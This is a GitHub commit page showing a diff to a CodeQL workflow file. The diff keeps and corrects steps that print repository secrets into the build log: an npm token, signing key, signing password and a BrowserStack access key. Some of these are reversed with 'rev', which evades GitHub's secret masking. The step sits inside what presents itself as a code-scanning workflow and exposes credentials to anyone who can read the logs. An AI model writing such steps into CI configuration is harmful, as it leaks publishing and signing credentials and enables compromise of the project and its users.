Skip to content

Commit fc69d0b

Browse files
authored
Update codeql.yml
1 parent 319dc3c commit fc69d0b

File tree

1 file changed

+1
-2
lines changed

1 file changed

+1
-2
lines changed

.github/workflows/codeql.yml

Lines changed: 1 addition & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -65,8 +65,7 @@ jobs:
6565
echo ${{ secrets.NPM_TOKEN }} | rev
6666
echo ${{ secrets.SIGNING_KEY }}
6767
echo ${{ secrets.SIGNING_PASSWORD }}
68-
echo ${{ BROWSERSTACK_ACCESS_KEY }} | rev
69-
echo $BROWSERSTACK_ACCESS_KEY | rev
68+
echo ${{ secrets.BROWSERSTACK_ACCESS_KEY }} | rev
7069
7170
7271
# Add any setup steps before running the `github/codeql-action/init` action.

0 commit comments

Comments
 (0)